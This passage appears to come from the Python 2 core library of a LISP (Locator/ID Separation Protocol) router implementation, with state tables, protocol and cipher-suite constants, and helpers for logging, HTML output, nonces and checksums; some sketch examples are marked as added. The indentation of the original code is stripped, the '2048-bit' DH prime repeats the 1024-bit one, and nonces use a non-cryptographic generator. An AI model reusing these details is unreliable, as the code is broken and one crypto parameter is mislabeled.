lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time the g, p, and public-key values are created. The value is
# an array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
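#
# Illustrative sketch (not in the original source) of the shape of these
# tables. The per-RLOC dictionaries are keyed by "<rloc>:<port>" strings;
# each value is a 4-slot array indexed by key-id, where unused slots hold
# None and used slots hold key objects (the key class is defined later in
# this file). For example:
#
# lisp_crypto_keys_by_rloc_encap["10.0.0.2:4341"] = [None, key, None, None]
#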
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. The key
# is the hostname sent in an Info-Request; the value is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests.
#
lisp_last_map_request_sent = None
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll hash the first long of an ICMP echo-request and
# echo-reply for testing purposes, to show per-packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is indexed by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# an EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends are
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
#
# Used to store NAT translated address state in an RTR when a ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error processing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# sits behind a NAT device.
#
# Dictionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_TEST_MR_INTERVAL = 60 # In units of seconds
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = 5 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
#LISP_RLOC_PROBE_INTERVAL = 60 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10 # In units of seconds
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
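#
# Illustrative summary table (not in the original source) of the RFC 8061
# cipher suite parameters documented above. The tuple field names are
# hypothetical; the code below selects ciphers by comparing a key's
# cipher_suite value against the LISP_CS_* constants directly.
#
# Format: cipher-suite: (DH group, cipher, IV-length-bytes)
#
LISP_CS_PARAMS_SKETCH = {
    LISP_CS_2048_CBC: ("2048-bit MODP", "AES-128-CBC", 16),
    LISP_CS_25519_CBC: ("EC 25519", "AES-128-CBC", 16),
    LISP_CS_2048_GCM: ("2048-bit MODP", "AES-128-GCM", 12),
    LISP_CS_3072: ("3072-bit MODP", "AES-128-GCM", 12),
    LISP_CS_25519_GCM: ("EC 25519", "AES-128-GCM", 12),
    LISP_CS_25519_CHACHA: ("EC 25519", "Chacha20-Poly1305", 8),
}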
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian_kali
#
# Return True if this system is running Kali Linux.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Alpine Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this system is running Linux (e.g., Ubuntu or Fedora).
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or
# dino-macbook.wp.comcast.net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed.
#
def lprint(*args):
if (lisp_debug_logging == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args: print arg,
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text-based bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
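#
# _convert_font_example
#
# Usage sketch (not part of the original source): red()/green()/blue()/
# bold() embed ANSI escape sequences for terminal output; convert_font()
# rewrites those sequences into the equivalent HTML markup for the web
# interface.
#
def _convert_font_example():
    ansi = red("rloc-down", False)
    return(convert_font(ansi))
#enddef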
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px;" ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select a random UDP port for use as the source port in a Map-Request and
# the destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
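#
# _lisp_hex_string_examples
#
# Usage sketch (not part of the original source) for lisp_hex_string().
#
def _lisp_hex_string_examples():
    assert lisp_hex_string(255) == "ff"
    assert lisp_hex_string(0xdfdf) == "dfdf"
    #
    # Python 2 appends "L" to long integers; it is stripped.
    #
    assert lisp_hex_string(2**64 - 1) == "ffffffffffffffff"
#enddef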
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
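#
# _lisp_timestamp_examples
#
# Usage sketch (not part of the original source) for the timestamp
# helpers above.
#
def _lisp_timestamp_examples():
    ts = lisp_set_timestamp(90)            # 90 seconds into the future
    assert lisp_print_future(ts) != "expired"
    assert lisp_print_elapsed(0) == "never"
    assert lisp_print_future(0) == "never"
#enddef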
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it to an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
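#
# _lisp_convert_6to4_examples
#
# Usage sketch (not part of the original source) for lisp_convert_6to4().
#
def _lisp_convert_6to4_examples():
    assert lisp_convert_6to4("::ffff:10.0.0.1") == "10.0.0.1"
    #
    # Strings without the "::ffff:" prefix are returned unchanged.
    #
    assert lisp_convert_6to4("10.0.0.1") == "10.0.0.1"
#enddef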
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socket.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) > 1):
if (ipv4[0].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
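#
# _lisp_gethostbyname_examples
#
# Usage sketch (not part of the original source): address literals are
# recognized and returned as-is; only DNS names reach the resolver.
#
def _lisp_gethostbyname_examples():
    assert lisp_gethostbyname("10.0.0.1") == "10.0.0.1"
    assert lisp_gethostbyname("fe80::1") == "fe80::1"
#enddef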
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data):
if (len(data) < 20):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 40, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
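#
# _lisp_ip_checksum_example
#
# Usage sketch (not part of the original source): build a minimal 20-byte
# IPv4 header (header-only, total-length 20, protocol 17) with a zeroed
# checksum field and let lisp_ip_checksum() fill in bytes 10 and 11. The
# addresses are hypothetical placeholders.
#
def _lisp_ip_checksum_example():
    hdr = struct.pack("!BBHHHBBH", 0x45, 0, 20, 0, 0, 64, 17, 0)
    hdr += socket.inet_aton("10.0.0.1") + socket.inet_aton("10.0.0.2")
    return(lisp_ip_checksum(hdr))
#enddef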
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
